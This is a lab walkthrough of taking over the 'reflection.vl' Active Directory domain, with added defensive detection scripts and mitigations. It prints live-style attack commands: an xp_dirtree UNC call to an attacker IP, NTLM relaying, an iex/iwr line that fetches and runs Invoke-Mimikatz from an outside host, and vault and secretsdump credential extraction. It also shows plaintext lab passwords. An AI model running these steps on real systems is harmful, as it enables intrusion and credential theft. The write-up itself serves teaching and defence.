Target Hosts
10.10.199.69 dc01.reflection.vl reflection.vl
10.10.199.70 ms01.reflection.vl
10.10.199.71 ws01.reflection.vl
Nmap Scan — DC01
Nmap scan report for 10.10.199.69
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-24 13:47:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-24T13:46:14
|_Not valid after: 2053-08-24T13:46:14
|_ssl-date: 2023-08-24T13:48:49+00:00; -2s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.reflection.vl
| Not valid before: 2023-06-06T16:19:23
|_Not valid after: 2023-12-06T16:19:23
|_ssl-date: 2023-08-24T13:48:49+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: dc01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-24T13:48:09+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-08-24T13:48:10
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Nmap Scan — MS01
Nmap scan report for 10.10.199.70
Host is up (0.18s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-08-24T13:50:49+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-24T13:43:40
|_Not valid after: 2053-08-24T13:43:40
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ms01.reflection.vl
| Not valid before: 2023-06-06T16:41:09
|_Not valid after: 2023-12-06T16:41:09
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: ms01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-24T13:50:11+00:00
|_ssl-date: 2023-08-24T13:50:50+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-08-24T13:50:14
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Nmap Scan — WS01
Nmap scan report for 10.10.199.71
Host is up (0.20s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ws01.reflection.vl
| Not valid before: 2023-06-06T16:42:13
|_Not valid after: 2023-12-06T16:42:13
|_ssl-date: 2023-08-24T13:52:37+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: REFLECTION
| NetBIOS_Domain_Name: REFLECTION
| NetBIOS_Computer_Name: WS01
| DNS_Domain_Name: reflection.vl
| DNS_Computer_Name: ws01.reflection.vl
| DNS_Tree_Name: reflection.vl
| Product_Version: 10.0.19041
|_ System_Time: 2023-08-24T13:51:57+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-24T13:52:03
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
SMB Enumeration — MS01
We can list the SMB shares using an anonymous login.
smbclient -N -L //10.10.199.70/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
staging Disk staging environment
SMB1 disabled -- no workgroup available
A config file, staging_db.conf, is found in the staging share.
smbclient -no-pass //10.10.199.70/staging/
Password for [WORKGROUP\user]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 8 01:42:48 2023
.. D 0 Thu Jun 8 01:41:25 2023
staging_db.conf A 50 Thu Jun 8 19:21:49 2023
6261245 blocks of size 4096. 1760432 blocks available
The config file contains the credentials of the web_staging account.
user=web_staging
password=Washroom510
db=staging
MSSQL Enumeration — MS01
With the obtained credentials, we can check which MSSQL server accepts them.
We can then log in to that MSSQL server using impacket-mssqlclient.
In the staging database there is a users table containing some credentials. However, using those credentials to enumerate other services such as SMB, WinRM, etc. doesn't find anything useful. Apart from that, the current user doesn't have the sa privileges necessary for elevating privileges or achieving code execution on the host.
UNC Path Injection — MS01
Since no other attack vectors are available, we can try UNC path injection on the MSSQL server in order to capture the NTLMv2 hash of the SQL service account. The xp_dirtree procedure makes the SQL service account connect to a path we supply, so we set up an SMB server and execute the xp_dirtree procedure on the SQL server with a UNC path pointing at it.
Although we now have the NTLMv2 hash of the svc_web_staging service account, it doesn't seem to use a weak password that we can crack easily.
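From the defender's side, the statements that drive this coercion are visible in SQL Server Audit or Extended Events captures. The following Python is an added example, not part of the original writeup: it scans T-SQL statements for the UNC-capable extended procedures and flags any whose UNC host is a raw IP address or is not on an allowlist. The statements, login names, and the allowlist (TRUSTED_UNC_HOSTS) are constructed for the example.

```python
import ipaddress
import re

# Constructed sample: (login, statement) pairs as they would appear in a
# SQL Server Audit "statement" column or a sql_batch_completed event.
SAMPLE_STATEMENTS = [
    ("web_staging", r"SELECT name FROM sys.databases"),
    ("web_staging", r"EXEC master..xp_dirtree '\\10.8.0.211\test\'"),
    ("web_staging", r"exec master.dbo.xp_fileexist '\\attacker-box\share\x.txt'"),
    ("backup_svc", r"EXEC master..xp_dirtree '\\fileserver01.reflection.vl\backups\'"),
    ("web_staging", r"SELECT * FROM users WHERE name = 'bob'"),
]

# Extended procedures that make the SQL Server service account open an
# outbound SMB connection (and authenticate) when handed a UNC path.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_cmdshell", "xp_getfiledetails")
PROC_RE = re.compile(r"\b(" + "|".join(UNC_PROCS) + r")\b", re.IGNORECASE)
# Two leading backslashes, a host name or address, then a path separator.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")

# Assumed allowlist of file servers the SQL service account legitimately reaches.
TRUSTED_UNC_HOSTS = {"fileserver01.reflection.vl"}


def find_unc_coercion(statements, trusted_hosts=TRUSTED_UNC_HOSTS):
    """Return (login, procedure, unc_host, reason) for every statement that
    points a UNC-capable procedure at a host outside the allowlist."""
    findings = []
    for login, stmt in statements:
        proc = PROC_RE.search(stmt)
        unc = UNC_RE.search(stmt)
        if not (proc and unc):
            continue
        target = unc.group(1)
        if target.lower() in trusted_hosts:
            continue
        try:
            ipaddress.ip_address(target)
            reason = "raw IP address as UNC host"
        except ValueError:
            reason = "UNC host not in allowlist"
        findings.append((login, proc.group(1).lower(), target, reason))
    return findings


if __name__ == "__main__":
    for finding in find_unc_coercion(SAMPLE_STATEMENTS):
        print("ALERT", finding)
```

Beyond alerting, the practical mitigations are to revoke EXECUTE on these procedures from application logins that do not need them, to block outbound TCP/445 from database servers at the network edge, and to run the SQL Server service under an account with no rights on other hosts.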
NTLMv2 Relaying to DC01
Since we can't crack the hash, we can try relaying it to the other hosts (DC01 and WS01). If the svc_web_staging user is a local administrator on the target host, we gain code execution. However, NTLMv2 relaying against SMB is only possible if the target host does not require SMB signing. We can use crackmapexec to check the SMB signing status on the target hosts.
Fortunately, SMB signing is not required on any of the hosts.
impacket-ntlmrelayx can be used to relay the hash and try to gain code execution on the target.
Then we execute the previous xp_dirtree procedure on the MSSQL server again.
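The signing verdict that decides whether relaying is possible is already present in the Nmap output above (the smb2-security-mode host script). As an added defender-side example, not part of the original writeup, the following Python parses Nmap normal-format output and lists the hosts that accept unsigned SMB sessions, so the same scan an attacker uses can feed a hardening backlog. The embedded scan text uses documentation addresses (192.0.2.x) and is constructed; the function names are the example's own.

```python
import re

# Constructed sample: abbreviated Nmap "normal" output in the same shape as
# the scans above (host header, then the smb2-security-mode result).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
Host is up (0.19s latency).
Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
Nmap scan report for 192.0.2.11
Host is up (0.18s latency).
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
Nmap scan report for 192.0.2.12
Host is up (0.20s latency).
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
Nmap scan report for 192.0.2.13
Host is up (0.21s latency).
| smb2-security-mode:
|   311:
|_    Message signing disabled
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SIGNING_RE = re.compile(r"^\|_?\s*Message signing (.+)$")


def parse_smb_signing(nmap_output):
    """Map each scanned host to its SMB2 signing mode.

    Returns {host: 'required' | 'not_required' | 'disabled' | 'unknown'}.
    """
    results = {}
    host = None
    in_section = False
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = "unknown"
            in_section = False
            continue
        if host is None:
            continue
        if "smb2-security-mode" in line:
            in_section = True
            continue
        if in_section:
            m = SIGNING_RE.match(line)
            if m:
                text = m.group(1).lower()
                if "not required" in text:
                    results[host] = "not_required"
                elif "required" in text:
                    results[host] = "required"
                elif "disabled" in text:
                    results[host] = "disabled"
                in_section = False
    return results


def hosts_without_required_signing(nmap_output):
    """Hosts that accept an unsigned SMB session, i.e. where a relayed
    authentication would not be rejected on signing grounds."""
    return sorted(h for h, v in parse_smb_signing(nmap_output).items()
                  if v in ("not_required", "disabled"))


if __name__ == "__main__":
    for h in hosts_without_required_signing(SAMPLE_NMAP_OUTPUT):
        print("SMB signing not required:", h)
```

The fix for every host this lists is the policy "Microsoft network server: Digitally sign communications (always)" (the RequireSecuritySignature value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters), which is enforced by default only on domain controllers.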
EXEC master..xp_dirtree '\\10.8.0.211\test\';
Once executed, we see that authentication against the dc01 host as the svc_web_staging service account succeeds. However, we get an RPC access denied error and code execution fails, because the svc_web_staging user isn't a local administrator on the target host.
Although direct code execution isn't successful, we can still try accessing the SMB shares on the dc01 host in the context of the svc_web_staging user.
This time we use the -i flag instead, in order to spawn an interactive SMB shell.
impacket-ntlmrelayx --no-http-server -smb2support -t dc01.reflection.vl -i
We can then access the SMB shares on 127.0.0.1:11000.
Connecting to the SMB shares, we find another non-default share named prod.
In the share there is a file that appears to be the config for the production database.
It contains another set of credentials, for the web_prod user.
user=web_prod
password=Trib********
db=prod
We can then enumerate again to see which MSSQL host web_prod can access.
We now connect to the MSSQL server on the DC01 host.
There we find another database, prod, along with its users.
Active Directory Enumeration
We can use one of the discovered credentials to run bloodhound-python ingestor.
bloodhound-python -u dorothy.rose@reflection.vl -p 'hC_fn*********' -dc dc01.reflection.vl -d reflection.vl -ns 10.10.154.181 -c all --zip
In BloodHound, we see that abbie.smith has GenericAll rights on the MS01 computer object, which means we could abuse Resource-based Constrained Delegation (RBCD) to gain code execution on MS01.
In order to perform the RBCD attack, we first need to create a computer account. By default, any domain user can join up to 10 computers to an Active Directory domain; the limit is stored in the ms-DS-MachineAccountQuota attribute of the domain object, and crackmapexec has a module to check it.
However, the MachineAccountQuota is 0 here, so we can't add new computers and the RBCD attack isn't possible at this point. So what can we do with the GenericAll rights? Basically, we should be able to read and write every attribute of the MS01 computer object. This means that if the Local Administrator Password Solution (LAPS) is installed on MS01, the local administrator password is stored in its ms-Mcs-AdmPwd attribute, and with GenericAll we can read that attribute to extract it. We can check whether LAPS is installed on MS01 in BloodHound using a custom query. (I just changed the haslaps value to true.)
{
    "name": "Computers with LAPS",
    "category": "Information Gathering",
    "queryList": [
        {
            "final": false,
            "title": "Select a Domain...",
            "query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC"
        },
        {
            "final": true,
            "query": "MATCH p = (d:Domain {name: $result})-[r:Contains*1..]->(c:Computer {haslaps: true}) RETURN p"
        }
    ]
},
We can confirm that LAPS is indeed installed on the host.
Using crackmapexec again, we can extract the LAPS password.
We then gain access to the MS01 host and disable Windows Defender.
Next, we load the Invoke-Mimikatz.ps1 script into memory.
iex (iwr 10.8.0.211/Invoke-Mimikatz.ps1 -UseBasicParsing)
Then we can check the Windows Credential Vault to see whether any stored credentials exist.
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
Another credential, for Georgia.Price, is found in the vault; it is used by a scheduled task.
RBCD Abuse (again …..?)
Going back to BloodHound, we see that Georgia.Price has GenericAll rights on the WS01 computer object, which again could be abused to carry out the RBCD attack. Unlike the previous scenario, where we couldn't create computer accounts and had no computer account under our control, we now control the MS01$ computer account, so we can use it to perform the attack.
We can leverage the impacket-secretsdump script to extract the computer account hash of the MS01 host.
Following this, we first check the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the WS01 computer object using the impacket-rbcd script. The attribute is currently empty.
We can then append MS01$ to the attribute.
Once the attribute has been modified, the impacket-getST script can be used to request a service ticket for WS01 that impersonates another user (Administrator in this case).
After that we can export the generated ccache file.
We can finally gain code execution on the WS01 host using the impersonated Kerberos ticket.
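The write to msDS-AllowedToActOnBehalfOfOtherIdentity that makes this attack work is one of the few durable traces it leaves, and it is logged as Windows Security event 5136 ("A directory service object was modified") when Directory Service Changes auditing is enabled and the computer objects carry a SACL. The following Python is an added example, not from the original writeup: it runs over event records as a SIEM would present them after field extraction and raises an alert whenever a delegation-related attribute (including the machine account quota discussed earlier) is changed by an account outside an assumed allowlist. The event records, the actor names, and the allowlist EXPECTED_WRITERS are constructed.

```python
# Constructed sample: extracted fields of Windows Security events. Only the
# fields the detection reads are included; values are invented.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "Georgia.Price",
     "ObjectDN": "CN=WS01,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "svc_provisioning",
     "ObjectDN": "CN=WS02,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=WS03,CN=Computers,DC=reflection,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "DC=reflection,DC=vl", "ObjectClass": "domainDNS",
     "AttributeLDAPDisplayName": "ms-DS-MachineAccountQuota", "OperationType": "%%14674"},
    {"EventID": 4624, "SubjectUserName": "Abbie.Smith"},
]

# Attributes whose modification changes who may act on behalf of, or
# delegate to, a principal, or who may join machines to the domain.
DELEGATION_ATTRS = {
    "msds-allowedtoactonbehalfofotheridentity": "RBCD: inbound delegation to this object changed",
    "msds-allowedtodelegateto": "constrained delegation target list changed",
    "ms-ds-machineaccountquota": "machine account quota changed",
}

# Assumed allowlist: the provisioning identity that legitimately sets RBCD
# (e.g. for a deployment system). Everyone else triggers an alert.
EXPECTED_WRITERS = {"svc_provisioning"}

# Resource-string codes Windows uses in 5136 for the operation type.
OP_NAMES = {"%%14674": "Value Added", "%%14675": "Value Deleted"}


def detect_delegation_changes(events, expected_writers=EXPECTED_WRITERS):
    """Return one alert dict per 5136 event that modifies a delegation
    attribute and was not performed by an expected writer."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        attr = ev.get("AttributeLDAPDisplayName", "").lower()
        if attr not in DELEGATION_ATTRS:
            continue
        actor = ev.get("SubjectUserName", "")
        if actor in expected_writers:
            continue
        alerts.append({
            "actor": actor,
            "object": ev.get("ObjectDN"),
            "attribute": ev.get("AttributeLDAPDisplayName"),
            "operation": OP_NAMES.get(ev.get("OperationType"), ev.get("OperationType")),
            "reason": DELEGATION_ATTRS[attr],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_delegation_changes(SAMPLE_EVENTS):
        print("ALERT", alert)
```

A matching preventive control is to review who holds GenericAll, WriteDacl or WriteProperty on computer objects, since any such principal can perform this write; BloodHound's own edges make that audit straightforward.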
Using the secretsdump script again, we can extract the hashes on the WS01 host and find the credentials of Rhys.Garner.
Checking what permissions Rhys.Garner has in BloodHound doesn't show anything useful.
Since we now have another password, we can try spraying it to see whether it is reused by another user. To enumerate all AD users, we can use the GetADUsers script from impacket.
impacket-GetADUsers -all -dc-ip dc01.reflection.vl reflection.vl/abbie.smith:'CMe1*********'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Querying dc01.reflection.vl for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2023-06-08 00:14:01.041178 2023-08-27 21:37:25.291898
Guest <never> <never>
labadm 2023-06-08 00:14:08.010484 <never>
krbtgt 2023-06-08 00:19:21.946768 <never>
Georgia.Price 2023-06-08 01:31:20.923458 2023-08-27 21:36:17.749624
Michael.Wilkinson 2023-06-08 01:31:21.032613 <never>
Bethany.Wright 2023-06-08 01:31:21.095442 <never>
Craig.Williams 2023-06-08 01:31:21.188909 <never>
Abbie.Smith 2023-06-08 01:31:21.251507 <never>
Dorothy.Rose 2023-06-08 01:31:21.314143 <never>
Dylan.Marsh 2023-06-08 01:31:21.392881 <never>
Rhys.Garner 2023-06-08 01:31:21.449098 2023-06-08 20:01:27.028770
Jeremy.Marshall 2023-06-08 01:31:21.502186 <never>
Deborah.Collins 2023-06-08 01:31:21.553532 <never>
svc_web_prod 2023-06-08 01:47:59.981338 2023-08-27 21:23:07.194792
svc_web_staging 2023-06-08 01:48:26.340517 2023-06-08 19:17:15.948136
dom_rgarner 2023-06-08 03:25:40.067821 <never>
The password is indeed reused by another user, dom_rgarner, who is a domain admin.
We use those credentials to log in to the DC01 host and get the flag.